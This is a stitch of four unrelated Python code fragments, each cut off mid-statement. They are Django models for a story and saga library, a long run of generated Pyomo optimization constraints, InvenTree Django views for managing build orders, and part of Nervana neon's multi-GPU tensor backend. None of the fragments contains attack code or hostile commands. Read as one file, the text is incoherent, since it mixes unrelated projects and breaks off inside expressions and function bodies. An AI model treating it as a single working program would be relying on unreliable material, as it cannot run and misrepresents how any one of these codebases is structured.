file = models.FileField(
# see: library.util.story_path
# PREFIX + LETTER + 2xSLUG + ordinal + date + ext
max_length=15 + 2 + 2*(Story.SLUG_LEN+1) + 4 + 11 + 5
)
checksum = models.CharField(
max_length=64,
blank=True,
)
@property
def file_as_html(self):
if self.file:
# seems some storage providers only return bytes
with self.file.open(mode='rb') as f:
html = f.read()
return html.decode('utf-8')
else:
return None
@file_as_html.setter
def file_as_html(self, value):
assert isinstance(value, str), 'Expected a string; cannot delete here.'
if not value:
return
buf = BytesIO(value.encode('utf-8'))
checksum = b64md5sum(buf)
if checksum != self.checksum:
buf.seek(0)
file_path = inst_path(self.story.slug, self.ordinal, self.published_on)
self.file.save(file_path, buf)
self.checksum = checksum
@cached_property
def versions(self):
# NOTE: this only good if prefetching all versions of all whatevers
installments = self.story.installments.all()
versions = [inst for inst in installments if inst.ordinal == self.ordinal]
# return sorted(versions, key=lambda inst: inst.published_on)
return versions
# return self.story.installments.filter(ordinal=self.ordinal)
@property
def exists(self):
return True if self.file else False
@property
def date_published(self):
dates = self.story.installment_dates[self.ordinal]
return dates['date_published'] if dates['date_published'].year > 1 else None
# return self.versions[0].published_on
@property
def date_updated(self):
dates = self.story.installment_dates[self.ordinal]
published_on = dates['date_published']
updated_on = dates['date_updated']
return updated_on if updated_on != published_on else None
# published_on = self.date_published_on
# updated_on = self.versions[-1].published_on
# return updated_on if updated_on != published_on else None
@property
def story_str(self):
return '{} [{:03d}]'.format(self.story.title, self.ordinal)
def __str__(self):
return '{} [{:03d}] ~ {}'.format(self.story.title, self.ordinal, self.title)
class Meta:
unique_together = ('story', 'ordinal', 'published_on')
@staticmethod
def _ord_seeker(forward=True):
qs = Installment.objects \
.filter(story__pk=OuterRef('story__pk'), is_current=True) \
.exclude(file='') \
.values_list('ordinal', flat=True)
if forward:
return qs.filter(ordinal__gt=OuterRef('ordinal')).order_by('ordinal')
else:
return qs.filter(ordinal__lt=OuterRef('ordinal')).order_by('-ordinal')
@staticmethod
def prev_sq():
return Subquery(Installment._ord_seeker(False)[:1])
@staticmethod
def next_sq():
return Subquery(Installment._ord_seeker(True)[:1])
def get_absolute_url(self):
return reverse('installment', args=[str(self.story.slug), int(self.ordinal)])
def save(self, *args, **kwargs):
# TODO: fixup is_current
super().save(*args, **kwargs)
class SagaDisplayManager(models.Manager):
def get_queryset(self):
return super().get_queryset() \
.annotate(author_dicts=Saga.authors_sq(),
code_abbrs=Saga.codes_sq(),
updated_on=Saga.updated_on_sq(),
entry_count=Saga.entry_count_sq())
class Saga(models.Model, AuthorsMixin, CodesMixin):
slug = ShortUUIDField(
primary_key=True,
)
name = models.CharField(
max_length=Story.TITLE_LEN,
)
sort_name = models.CharField(
max_length=Story.TITLE_LEN,
)
synopsis = models.TextField()
stories = models.ManyToManyField(
'Story',
through='SagaEntry',
related_name='sagas',
)
@property
def stories_ordered(self):
return Story.display_objects \
.filter(sagaentry__saga=self) \
.order_by('sagaentry__order')
@property
def entry_count(self):
if not hasattr(self, '_ec'):
self._ec = self.stories.count()
return self._ec
@entry_count.setter
def entry_count(self, value):
self._ec = value
@property
def current_index(self):
return self._ci
@current_index.setter
def current_index(self, value):
self._ci = value
@cached_property
def prev_entry(self):
if self.current_index and 1 < self.current_index:
# current_index is 1-indexed
return self.stories_ordered.all()[self.current_index-2]
return None
@cached_property
def next_entry(self):
if self.current_index and self.current_index < self.entry_count:
# current_index is 1-indexed
return self.stories_ordered.all()[self.current_index]
return None
objects = models.Manager()
display_objects = SagaDisplayManager()
def __str__(self):
return '{} [{}]'.format(self.name, self.slug)
class Meta:
ordering = ['sort_name']
def get_absolute_url(self):
return reverse('saga', args=[str(self.slug)])
def save(self, *args, **kwargs):
if not self.sort_name:
self.sort_name = get_sort_name(self.name)[:Story.TITLE_LEN]
# TODO: is this safe? no, it's not...
while True:
try:
super().save(*args, **kwargs)
break
except IntegrityError:
self.slug = ShortUUIDField.gen()
@staticmethod
def authors_sq(separator=DEFAULT_AUTHOR_SEP):
return Subquery(Author.objects
.order_by()
.filter(stories__sagas__pk=OuterRef('pk'))
.annotate(names=Concat('name', separator=separator))
.values('names')
)
@staticmethod
def codes_sq():
return Subquery(Code.objects
.order_by()
.filter(stories__sagas__pk=OuterRef('pk'))
.annotate(abbrs=Concat('abbr', distinct=True))
.values('abbrs')
)
@staticmethod
def updated_on_sq():
return Subquery(Installment.objects
| |
m.x3716 - m.x3717 - m.x3718
- m.x3719 - m.x3720 - m.x3721 - m.x3722 - m.x3723 - m.x3724 - m.x3725 - m.x3726 - m.x3727
- m.x3728 - m.x3729 - m.x3730 - m.x3731 - m.x3732 - m.x3733 - m.x3734 - m.x3735 - m.x3736
- m.x3737 - m.x3738 - m.x3739 - m.x3740 - m.x3741 - m.x3742 - m.x3743 - m.x3744 - m.x3745
- m.x3746 - m.x3747 - m.x3748 - m.x3749 - m.x3750 - m.x3751 + m.x4324 == 0)
m.c2562 = Constraint(expr= - m.x3752 - m.x3753 - m.x3754 - m.x3755 - m.x3756 - m.x3757 - m.x3758 - m.x3759 - m.x3760
- m.x3761 - m.x3762 - m.x3763 - m.x3764 - m.x3765 - m.x3766 - m.x3767 - m.x3768 - m.x3769
- m.x3770 - m.x3771 - m.x3772 - m.x3773 - m.x3774 - m.x3775 - m.x3776 - m.x3777 - m.x3778
- m.x3779 - m.x3780 - m.x3781 - m.x3782 - m.x3783 - m.x3784 - m.x3785 - m.x3786 - m.x3787
- m.x3788 - m.x3789 - m.x3790 - m.x3791 - m.x3792 - m.x3793 + m.x4325 == 0)
m.c2563 = Constraint(expr= - m.x3794 - m.x3795 - m.x3796 - m.x3797 - m.x3798 - m.x3799 - m.x3800 - m.x3801 - m.x3802
- m.x3803 - m.x3804 - m.x3805 - m.x3806 - m.x3807 - m.x3808 - m.x3809 - m.x3810 - m.x3811
- m.x3812 - m.x3813 - m.x3814 - m.x3815 - m.x3816 - m.x3817 - m.x3818 - m.x3819 - m.x3820
- m.x3821 - m.x3822 - m.x3823 - m.x3824 - m.x3825 - m.x3826 - m.x3827 - m.x3828 - m.x3829
- m.x3830 - m.x3831 - m.x3832 - m.x3833 - m.x3834 - m.x3835 + m.x4326 == 0)
m.c2564 = Constraint(expr= - m.x3836 - m.x3837 - m.x3838 - m.x3839 - m.x3840 - m.x3841 - m.x3842 - m.x3843 - m.x3844
- m.x3845 - m.x3846 - m.x3847 - m.x3848 - m.x3849 - m.x3850 - m.x3851 - m.x3852 - m.x3853
- m.x3854 - m.x3855 - m.x3856 - m.x3857 - m.x3858 - m.x3859 - m.x3860 - m.x3861 - m.x3862
- m.x3863 - m.x3864 - m.x3865 - m.x3866 - m.x3867 - m.x3868 - m.x3869 - m.x3870 - m.x3871
- m.x3872 - m.x3873 - m.x3874 - m.x3875 - m.x3876 - m.x3877 + m.x4327 == 0)
m.c2565 = Constraint(expr= - m.x3878 - m.x3879 - m.x3880 - m.x3881 - m.x3882 - m.x3883 - m.x3884 - m.x3885 - m.x3886
- m.x3887 - m.x3888 - m.x3889 - m.x3890 - m.x3891 - m.x3892 - m.x3893 - m.x3894 - m.x3895
- m.x3896 - m.x3897 - m.x3898 - m.x3899 - m.x3900 - m.x3901 - m.x3902 - m.x3903 - m.x3904
- m.x3905 - m.x3906 - m.x3907 - m.x3908 - m.x3909 - m.x3910 - m.x3911 - m.x3912 - m.x3913
- m.x3914 - m.x3915 - m.x3916 - m.x3917 + m.x4328 == 0)
m.c2566 = Constraint(expr= - m.x3918 - m.x3919 - m.x3920 - m.x3921 - m.x3922 - m.x3923 - m.x3924 - m.x3925 - m.x3926
- m.x3927 - m.x3928 - m.x3929 - m.x3930 - m.x3931 - m.x3932 - m.x3933 - m.x3934 - m.x3935
- m.x3936 - m.x3937 - m.x3938 - m.x3939 - m.x3940 - m.x3941 - m.x3942 - m.x3943 - m.x3944
- m.x3945 - m.x3946 - m.x3947 - m.x3948 - m.x3949 - m.x3950 - m.x3951 - m.x3952 - m.x3953
- m.x3954 - m.x3955 - m.x3956 - m.x3957 + m.x4329 == 0)
m.c2567 = Constraint(expr= - m.x3958 - m.x3959 - m.x3960 - m.x3961 - m.x3962 - m.x3963 - m.x3964 - m.x3965 - m.x3966
- m.x3967 - m.x3968 - m.x3969 - m.x3970 - m.x3971 - m.x3972 - m.x3973 - m.x3974 - m.x3975
- m.x3976 - m.x3977 - m.x3978 - m.x3979 - m.x3980 - m.x3981 - m.x3982 - m.x3983 - m.x3984
- m.x3985 - m.x3986 - m.x3987 - m.x3988 - m.x3989 - m.x3990 + m.x4330 == 0)
m.c2568 = Constraint(expr= - m.x3991 - m.x3992 - m.x3993 - m.x3994 - m.x3995 - m.x3996 - m.x3997 - m.x3998 - m.x3999
- m.x4000 - m.x4001 - m.x4002 - m.x4003 - m.x4004 - m.x4005 - m.x4006 - m.x4007 - m.x4008
- m.x4009 - m.x4010 - m.x4011 - m.x4012 - m.x4013 - m.x4014 - m.x4015 - m.x4016 - m.x4017
- m.x4018 - m.x4019 - m.x4020 - m.x4021 - m.x4022 - m.x4023 + m.x4331 == 0)
m.c2569 = Constraint(expr= - m.x4024 - m.x4025 - m.x4026 - m.x4027 - m.x4028 - m.x4029 - m.x4030 - m.x4031 - m.x4032
- m.x4033 - m.x4034 - m.x4035 - m.x4036 - m.x4037 - m.x4038 - m.x4039 - m.x4040 - m.x4041
- m.x4042 - m.x4043 - m.x4044 - m.x4045 - m.x4046 - m.x4047 - m.x4048 - m.x4049 - m.x4050
- m.x4051 - m.x4052 - m.x4053 - m.x4054 - m.x4055 - m.x4056 - m.x4057 - m.x4058 - m.x4059
- m.x4060 - m.x4061 - m.x4062 - m.x4063 - m.x4064 - m.x4065 - m.x4066 + m.x4332 == 0)
m.c2570 = Constraint(expr= - m.x3710 - m.x3711 - m.x3712 - m.x3713 - m.x3714 - m.x3715 - m.x3716 - m.x3717 - m.x3718
- m.x3719 - m.x3720 - m.x3721 - m.x3722 - m.x3723 - m.x3724 - m.x3725 - m.x3726 - m.x3727
- m.x3728 - m.x3729 - m.x3730 - m.x3731 - m.x3732 - m.x3733 - m.x3734 - m.x3735 - m.x3736
- m.x3737 - m.x3738 - m.x3739 - m.x3740 - m.x3741 - m.x3742 - m.x3743 - m.x3744 - m.x3745
- m.x3746 - m.x3747 - m.x3748 - m.x3749 - m.x3750 - m.x3751 - m.x3752 - m.x3753 - m.x3754
- m.x3755 - m.x3756 - m.x3757 - m.x3758 - m.x3759 - m.x3760 - m.x3761 - m.x3762 - m.x3763
- m.x3764 - m.x3765 - m.x3766 - m.x3767 - m.x3768 - m.x3769 - m.x3770 - m.x3771 - m.x3772
- m.x3773 - m.x3774 - m.x3775 - m.x3776 - m.x3777 - m.x3778 - m.x3779 - m.x3780 - m.x3781
- m.x3782 - m.x3783 - m.x3784 - m.x3785 - m.x3786 - m.x3787 - m.x3788 - m.x3789 - m.x3790
- m.x3791 - m.x3792 - m.x3793 - m.x3794 - m.x3795 - m.x3796 - m.x3797 - m.x3798 - m.x3799
- m.x3800 - m.x3801 - m.x3802 - m.x3803 - m.x3804 - m.x3805 - m.x3806 - m.x3807 - m.x3808
- m.x3809 - m.x3810 - m.x3811 - m.x3812 - m.x3813 - m.x3814 - m.x3815 - m.x3816 - m.x3817
- m.x3818 - m.x3819 - m.x3820 - m.x3821 - m.x3822 - m.x3823 - m.x3824 - m.x3825 - m.x3826
- m.x3827 - m.x3828 - m.x3829 - m.x3830 - m.x3831 - m.x3832 - m.x3833 - m.x3834 - m.x3835
- m.x3836 - m.x3837 - m.x3838 - m.x3839 - m.x3840 - m.x3841 - m.x3842 - m.x3843 - m.x3844
- m.x3845 - m.x3846 - m.x3847 - m.x3848 - m.x3849 - m.x3850 - m.x3851 - m.x3852 - m.x3853
- m.x3854 - m.x3855 - m.x3856 - m.x3857 - m.x3858 - m.x3859 - m.x3860 - m.x3861 - m.x3862
- m.x3863 - m.x3864 - m.x3865 - m.x3866 - m.x3867 - m.x3868 - m.x3869 - m.x3870 - m.x3871
- m.x3872 - m.x3873 - m.x3874 - m.x3875 - m.x3876 - m.x3877 - m.x3878 - m.x3879 - m.x3880
- m.x3881 - m.x3882 - m.x3883 - m.x3884 - m.x3885 - m.x3886 - m.x3887 - m.x3888 - m.x3889
- m.x3890 - m.x3891 - m.x3892 - m.x3893 - m.x3894 - m.x3895 - m.x3896 - m.x3897 - m.x3898
- m.x3899 - m.x3900 - m.x3901 - m.x3902 - m.x3903 - m.x3904 - m.x3905 - m.x3906 - m.x3907
- m.x3908 - m.x3909 - m.x3910 - m.x3911 - m.x3912 - m.x3913 - m.x3914 - m.x3915 - m.x3916
- m.x3917 - m.x3918 - m.x3919 - m.x3920 - m.x3921 - m.x3922 - m.x3923 - m.x3924 - m.x3925
- m.x3926 - m.x3927 - m.x3928 - m.x3929 - m.x3930 - m.x3931 - m.x3932 - m.x3933 - m.x3934
- m.x3935 - m.x3936 - m.x3937 - m.x3938 - m.x3939 - m.x3940 - m.x3941 - m.x3942 - m.x3943
- m.x3944 - m.x3945 - m.x3946 - m.x3947 - m.x3948 - m.x3949 - m.x3950 - m.x3951 - m.x3952
- m.x3953 - m.x3954 - m.x3955 - m.x3956 - m.x3957 - m.x3958 - m.x3959 - m.x3960 - m.x3961
- m.x3962 - m.x3963 - m.x3964 - m.x3965 - m.x3966 - m.x3967 - m.x3968 - m.x3969 - m.x3970
- m.x3971 - | |
"""
Django views for interacting with Build objects
"""
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.translation import ugettext as _
from django.core.exceptions import ValidationError
from django.views.generic import DetailView, ListView, UpdateView
from django.forms import HiddenInput
from django.urls import reverse
from part.models import Part
from .models import Build, BuildItem, BuildOrderAttachment
from . import forms
from stock.models import StockLocation, StockItem
from InvenTree.views import AjaxUpdateView, AjaxCreateView, AjaxDeleteView
from InvenTree.views import InvenTreeRoleMixin
from InvenTree.helpers import str2bool, extract_serial_numbers, normalize
from InvenTree.status_codes import BuildStatus
class BuildIndex(InvenTreeRoleMixin, ListView):
""" View for displaying list of Builds
"""
model = Build
template_name = 'build/index.html'
context_object_name = 'builds'
role_required = 'build.view'
def get_queryset(self):
""" Return all Build objects (order by date, newest first) """
return Build.objects.order_by('status', '-completion_date')
def get_context_data(self, **kwargs):
context = super(BuildIndex, self).get_context_data(**kwargs).copy()
context['BuildStatus'] = BuildStatus
context['active'] = self.get_queryset().filter(status__in=BuildStatus.ACTIVE_CODES)
context['completed'] = self.get_queryset().filter(status=BuildStatus.COMPLETE)
context['cancelled'] = self.get_queryset().filter(status=BuildStatus.CANCELLED)
return context
class BuildCancel(AjaxUpdateView):
""" View to cancel a Build.
Provides a cancellation information dialog
"""
model = Build
ajax_template_name = 'build/cancel.html'
ajax_form_title = _('Cancel Build')
context_object_name = 'build'
form_class = forms.CancelBuildForm
role_required = 'build.change'
def validate(self, build, form, **kwargs):
confirm = str2bool(form.cleaned_data.get('confirm_cancel', False))
if not confirm:
form.add_error('confirm_cancel', _('Confirm build cancellation'))
def save(self, build, form, **kwargs):
"""
Cancel the build.
"""
build.cancelBuild(self.request.user)
def get_data(self):
return {
'danger': _('Build was cancelled')
}
class BuildAutoAllocate(AjaxUpdateView):
""" View to auto-allocate parts for a build.
Follows a simple set of rules to automatically allocate StockItem objects.
Ref: build.models.Build.getAutoAllocations()
"""
model = Build
form_class = forms.AutoAllocateForm
context_object_name = 'build'
ajax_form_title = _('Allocate Stock')
ajax_template_name = 'build/auto_allocate.html'
role_required = 'build.change'
def get_initial(self):
"""
Initial values for the form.
"""
initials = super().get_initial()
# Pointing to a particular build output?
output = self.get_param('output')
if output:
try:
output = StockItem.objects.get(pk=output)
initials['output'] = output
except (ValueError, StockItem.DoesNotExist):
pass
return initials
def get_context_data(self, *args, **kwargs):
"""
Get the context data for form rendering.
"""
context = {}
build = self.get_object()
form = self.get_form()
output_id = form['output'].value()
try:
output = StockItem.objects.get(pk=output_id)
except (ValueError, StockItem.DoesNotExist):
output = None
if output:
context['output'] = output
context['allocations'] = build.getAutoAllocations(output)
context['build'] = build
return context
def get_form(self):
form = super().get_form()
if form['output'].value():
# Hide the 'output' field
form.fields['output'].widget = HiddenInput()
return form
def validate(self, build, form, **kwargs):
output = form.cleaned_data.get('output', None)
if not output:
form.add_error(None, _('Build output must be specified'))
def save(self, build, form, **kwargs):
"""
Once the form has been validated,
perform auto-allocations
"""
output = form.cleaned_data.get('output', None)
build.autoAllocate(output)
def get_data(self):
return {
'success': _('Allocated stock to build output'),
}
class BuildOutputCreate(AjaxUpdateView):
"""
Create a new build output (StockItem) for a given build.
"""
model = Build
form_class = forms.BuildOutputCreateForm
ajax_template_name = 'build/build_output_create.html'
ajax_form_title = _('Create Build Output')
role_required = 'build.change'
def validate(self, build, form, **kwargs):
"""
Validation for the form:
"""
quantity = form.cleaned_data.get('output_quantity', None)
serials = form.cleaned_data.get('serial_numbers', None)
# Check that the serial numbers are valid
if serials:
try:
extracted = extract_serial_numbers(serials, quantity)
if extracted:
# Check for conflicting serial numbers
conflicts = build.part.find_conflicting_serial_numbers(extracted)
if len(conflicts) > 0:
msg = ",".join([str(c) for c in conflicts])
form.add_error(
'serial_numbers',
_('Serial numbers already exist') + ': ' + msg,
)
except ValidationError as e:
form.add_error('serial_numbers', e.messages)
else:
# If no serial numbers are provided, should they be?
if build.part.trackable:
form.add_error('serial_numbers', _('Serial numbers required for trackable build output'))
def save(self, build, form, **kwargs):
"""
Create a new build output
"""
data = form.cleaned_data
quantity = data.get('output_quantity', None)
batch = data.get('batch', None)
serials = data.get('serial_numbers', None)
if serials:
serial_numbers = extract_serial_numbers(serials, quantity)
else:
serial_numbers = None
build.create_build_output(
quantity,
serials=serial_numbers,
batch=batch,
)
def get_initial(self):
initials = super().get_initial()
build = self.get_object()
# Calculate the required quantity
quantity = max(0, build.remaining - build.incomplete_count)
initials['quantity'] = quantity
return initials
def get_form(self):
build = self.get_object()
part = build.part
context = self.get_form_kwargs()
# Pass the 'part' through to the form,
# so we can add the next serial number as a placeholder
context['build'] = build
form = self.form_class(**context)
# If the part is not trackable, hide the serial number input
if not part.trackable:
form.fields['serial_numbers'].widget = HiddenInput()
return form
class BuildOutputDelete(AjaxUpdateView):
"""
Delete a build output (StockItem) for a given build.
Form is a simple confirmation dialog
"""
model = Build
form_class = forms.BuildOutputDeleteForm
ajax_form_title = _('Delete Build Output')
role_required = 'build.delete'
def get_initial(self):
initials = super().get_initial()
output = self.get_param('output')
initials['output_id'] = output
return initials
def validate(self, build, form, **kwargs):
data = form.cleaned_data
confirm = data.get('confirm', False)
if not confirm:
form.add_error('confirm', _('Confirm unallocation of build stock'))
form.add_error(None, _('Check the confirmation box'))
output_id = data.get('output_id', None)
output = None
try:
output = StockItem.objects.get(pk=output_id)
except (ValueError, StockItem.DoesNotExist):
pass
if output:
if not output.build == build:
form.add_error(None, _('Build output does not match build'))
else:
form.add_error(None, _('Build output must be specified'))
def save(self, build, form, **kwargs):
output_id = form.cleaned_data.get('output_id')
output = StockItem.objects.get(pk=output_id)
build.deleteBuildOutput(output)
def get_data(self):
return {
'danger': _('Build output deleted'),
}
class BuildUnallocate(AjaxUpdateView):
""" View to un-allocate all parts from a build.
Provides a simple confirmation dialog with a BooleanField checkbox.
"""
model = Build
form_class = forms.UnallocateBuildForm
ajax_form_title = _("Unallocate Stock")
ajax_template_name = "build/unallocate.html"
role_required = 'build.change'
def get_initial(self):
initials = super().get_initial()
# Pointing to a particular build output?
output = self.get_param('output')
if output:
initials['output_id'] = output
# Pointing to a particular part?
part = self.get_param('part')
if part:
initials['part_id'] = part
return initials
def post(self, request, *args, **kwargs):
build = self.get_object()
form = self.get_form()
confirm = request.POST.get('confirm', False)
output_id = request.POST.get('output_id', None)
try:
output = StockItem.objects.get(pk=output_id)
except (ValueError, StockItem.DoesNotExist):
output = None
part_id = request.POST.get('part_id', None)
try:
part = Part.objects.get(pk=part_id)
except (ValueError, Part.DoesNotExist):
part = None
valid = False
if confirm is False:
form.add_error('confirm', _('Confirm unallocation of build stock'))
form.add_error(None, _('Check the confirmation box'))
else:
build.unallocateStock(output=output, part=part)
valid = True
data = {
'form_valid': valid,
}
return self.renderJsonResponse(request, form, data)
class BuildComplete(AjaxUpdateView):
"""
View to mark the build as complete.
Requirements:
- There can be no outstanding build outputs
- The "completed" value must meet or exceed the "quantity" value
"""
model = Build
form_class = forms.CompleteBuildForm
role_required = 'build.change'
ajax_form_title = _('Complete Build Order')
ajax_template_name = 'build/complete.html'
def validate(self, build, form, **kwargs):
if not build.can_complete:
form.add_error(None, _('Build order cannot be completed'))
def save(self, build, form, **kwargs):
"""
Perform the build completion step
"""
build.complete_build(self.request.user)
def get_data(self):
return {
'success': _('Completed build order')
}
class BuildOutputComplete(AjaxUpdateView):
"""
View to mark a particular build output as Complete.
- Notifies the user of which parts will be removed from stock.
- Removes allocated items from stock
- Deletes pending BuildItem objects
"""
model = Build
form_class = forms.CompleteBuildOutputForm
context_object_name = "build"
ajax_form_title = _("Complete Build Output")
ajax_template_name = "build/complete_output.html"
role_required = 'build.change'
def get_form(self):
build = self.get_object()
form = super().get_form()
# Extract the build output object
output = None
output_id = form['output'].value()
try:
output = StockItem.objects.get(pk=output_id)
except (ValueError, StockItem.DoesNotExist):
pass
if output:
if build.isFullyAllocated(output):
form.fields['confirm_incomplete'].widget = HiddenInput()
return form
def validate(self, build, form, **kwargs):
data = form.cleaned_data
output = data.get('output', None)
if output:
quantity = data.get('quantity', None)
if quantity and quantity > output.quantity:
form.add_error('quantity', _('Quantity to complete cannot exceed build output quantity'))
if not build.isFullyAllocated(output):
confirm = str2bool(data.get('confirm_incomplete', False))
if not confirm:
form.add_error('confirm_incomplete', _('Confirm completion of incomplete build'))
else:
form.add_error(None, _('Build output must be specified'))
def get_initial(self):
""" Get initial form data for the CompleteBuild form
- If the part being built has a default location, pre-select that location
"""
initials = super().get_initial()
build = self.get_object()
if build.part.default_location is not None:
try:
location = StockLocation.objects.get(pk=build.part.default_location.id)
initials['location'] = location
except StockLocation.DoesNotExist:
pass
output = self.get_param('output', None)
if output:
try:
output = StockItem.objects.get(pk=output)
except (ValueError, StockItem.DoesNotExist):
output = None
# Output has not been supplied? Try to "guess"
if not output:
incomplete = build.get_build_outputs(complete=False)
if incomplete.count() == 1:
output = incomplete[0]
if output is not None:
initials['output'] = output
initials['location'] = build.destination
return initials
def get_context_data(self, **kwargs):
"""
Get context data for passing to the rendered form
- Build information is required
"""
build = self.get_object()
context = {}
# Build object
context['build'] = build
form = self.get_form()
output = form['output'].value()
if output:
try:
| |
# ----------------------------------------------------------------------------
# Copyright 2015 Nervana Systems Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
"""
Neon multigpu backend for NervanaGPU.
Decorates most functions from the single GPU backend.
The basic tensor type used here is the Multi GPU Tensor, which tracks shards
and replicas of data, weights, etc on different devices via maintenance of
contexts and an internal tensor list.
"""
import logging
from neon.backends.backend import Block
from neon.backends.gpu import GPU
from nervanagpu import NervanaGPU, GPUTensor
import pycuda.driver as drv
import numpy as np
from functools import wraps
import atexit
logger = logging.getLogger(__name__)
def replicate(method):
def decorate(cls):
@wraps(cls)
def func(self, *args, **kwargs):
if self.ng.block is not None:
self.call_stack.append((method, args, kwargs))
return
else:
tsrlist = []
for idx, ctx in enumerate(getattr(self, 'ctxs')):
ctx.push()
self.ng.stream = self.strms[idx]
myargs = [a.tlist[idx] if isinstance(
a, MGPUTensor) else a for a in args]
mykwargs = {k: v.tlist[idx] if isinstance(
v, MGPUTensor) else v for k, v in kwargs.iteritems()}
tsrlist.append(
getattr(super(cls, self), method)(*myargs, **mykwargs))
self.ng.stream = None
ctx.pop()
return MGPUTensor(tsrlist) if tsrlist[0] is not None else None
setattr(cls, method, func)
return cls
return decorate
def passthru(method):
def decorate(cls):
@wraps(cls)
def func(self, *args, **kwargs):
tsrlist = []
for idx, (tsr, ctx) in enumerate(zip(getattr(self, '_tensorlist'),
getattr(self, 'ctxs'))):
ctx.push()
myargs = [a.tlist[idx] if isinstance(
a, MGPUTensor) else a for a in args]
mykwargs = {k: v.tlist[idx] if isinstance(
v, MGPUTensor) else v for k, v in kwargs.iteritems()}
tsrlist.append(getattr(tsr, method)(*myargs, **mykwargs))
ctx.pop()
if tsrlist[0] is not None:
return MGPUTensor(tsrlist, ptype=self.ptype)
setattr(cls, method, func)
return cls
return decorate
@passthru('_assign')
@passthru('fill')
@passthru('reshape')
@passthru('copy_from')
@passthru('__getitem__')
@passthru('__add__')
@passthru('__sub__')
@passthru('__mul__')
@passthru('__div__')
@passthru('__truediv__')
@passthru('__pow__')
@passthru('__radd__')
@passthru('__rsub__')
@passthru('__rmul__')
@passthru('__rdiv__')
@passthru('__ne__')
@passthru('__eq__')
class MGPUTensor(object):
ctxs = None
num_dev = 0
def __init__(self, tensorlist, ptype='fragment'):
self._tensorlist = tensorlist
self.ptype = ptype
@property
def shape(self):
return self._tensorlist[0].shape
@property
def dtype(self):
return self._tensorlist[0].dtype
@property
def size(self):
return self._tensorlist[0].size
@property
def is_contiguous(self):
return self._tensorlist[0].is_contiguous
@property
def tlist(self):
return self._tensorlist
@property
def ptr(self):
return self._tensorlist[0].gpudata.__int__()
def __setitem__(self, index, value):
if self.ctxs is None:
raise ValueError("Contexts not defined")
for idx, (tsr, ctx) in enumerate(zip(getattr(self, '_tensorlist'),
getattr(self, 'ctxs'))):
ctx.push()
if isinstance(value, MGPUTensor):
tsr.__setitem__(index, value._tensorlist[idx])
else:
tsr.__setitem__(index, value)
ctx.pop()
def asnumpyarray(self):
if self.ptype == 'replica':
self.ctxs[0].push()
rval = self._tensorlist[0].get()
self.ctxs[0].pop()
return rval
else:
rval = []
for subtensor, ctx in zip(self.tlist, self.ctxs):
ctx.push()
npv = subtensor.get()
rval.append(npv)
ctx.pop()
if self.ptype == 'vfragment':
return np.vstack(rval)
else:
return np.hstack(rval)
@property
def T(self): # noqa
"""
return a transposed view
"""
tsrlist = []
for tsr in self._tensorlist:
tsrlist.append(GPUTensor(backend=tsr.backend,
shape=tsr.shape[::-1], dtype=tsr.dtype,
allocator=tsr.allocator, base=tsr,
gpudata=tsr.gpudata,
strides=tsr.strides[::-1],
is_trans=(not tsr.is_trans),
name=tsr.name, rounding=tsr.rounding))
return self.__class__(tsrlist)
@replicate('fprop_conv')
@replicate('convolution')
@replicate('bprop_conv')
@replicate('update_conv')
@replicate('fprop_pool')
@replicate('bprop_pool')
@replicate('logistic')
@replicate('rectlin')
@replicate('rectlin_derivative')
@replicate('rectleaky')
@replicate('rectleaky_derivative')
@replicate('sum')
@replicate('mean')
@replicate('min')
@replicate('max')
@replicate('variance')
@replicate('fabs')
@replicate('sqrt')
@replicate('zeros')
@replicate('ones')
@replicate('empty')
@replicate('array')
@replicate('add')
@replicate('subtract')
@replicate('multiply')
@replicate('divide')
@replicate('greater')
@replicate('equal')
@replicate('not_equal')
@replicate('clip')
@replicate('log')
@replicate('tanh')
@replicate('argmax')
@replicate('softmax')
@replicate('softmax_gradient')
@replicate('make_binary_mask')
@replicate('gdm_compound')
@replicate('gdmwd_compound')
@replicate('ada_update')
@replicate('crossent')
@replicate('transpose')
@replicate('logistic_compound')
@replicate('fprop_bn_compound')
@replicate('bprop_bn_compound')
class MGPU(GPU):
default_dtype = np.float32
num_dev = 1
is_dist = True
def __init__(self, rng_seed, stochastic_round=False, device_id=0,
num_dev=2):
drv.init()
self.num_dev = num_dev
if device_id == 0:
self.dev_list = range(num_dev)
else:
self.dev_list = device_id
assert len(self.dev_list) == self.num_dev
assert self.num_dev <= drv.Device.count()
self.ctxs = []
self.devs = []
self._strms = []
self._redstrms = []
self._events = []
self._redevents = []
self.async = True
self._nostrms = [None for i in self.dev_list]
for i in self.dev_list:
self.devs.append(drv.Device(i))
for dev in self.devs:
self.ctxs.append(
dev.make_context(drv.ctx_flags.SCHED_BLOCKING_SYNC))
self._strms.append(drv.Stream())
self._redstrms.append(drv.Stream())
self._events.append(drv.Event())
self._redevents.append(drv.Event())
drv.Context.pop()
self.ctxs[0].push()
atexit.register(drv.Context.pop)
MGPUTensor.ctxs = self.ctxs
MGPUTensor.num_dev = num_dev
self.ng = NervanaGPU(stochastic_round=stochastic_round)
logger.info("Initialized %d device NervanaGPU, stochastic_round=%s",
num_dev, stochastic_round)
self.ng.block = None
self.rng_seed = rng_seed
self.rng_init()
# Setup the pairwise contexts
# TODO clean up this code to avoid indexing
for dev1, ctx1 in zip(self.devs, self.ctxs):
ctx1.push()
for dev2, ctx2 in zip(self.devs, self.ctxs):
if dev1 == dev2:
continue
if dev1.can_access_peer(dev2):
ctx1.enable_peer_access(ctx2)
else:
print('Cannot enable peer access between '
'{:d} and {:d}'.format(dev1, dev2))
ctx1.pop()
def make_events(self):
evtlist = []
for ctx in self.ctxs:
ctx.push()
evtlist.append(drv.Event())
ctx.pop()
return evtlist
# These definitions are for performing grouped context commands
# This is experimental and should remove _stack for actual usage
def begin_stack(self, block, identifier):
if block == Block.update:
self.ng.block = Block.update
self.call_stack = []
else:
pass
def end_stack(self, block, identifier):
if block == Block.update:
self.ng.block = None
for idx, ctx in enumerate(self.ctxs):
ctx.push()
self.ng.stream = self.strms[idx]
for method, args, kwargs in self.call_stack:
myargs = [a._tensorlist[idx] if isinstance(
a, MGPUTensor) else a for a in args]
mykwargs = {k: v._tensorlist[idx] if isinstance(
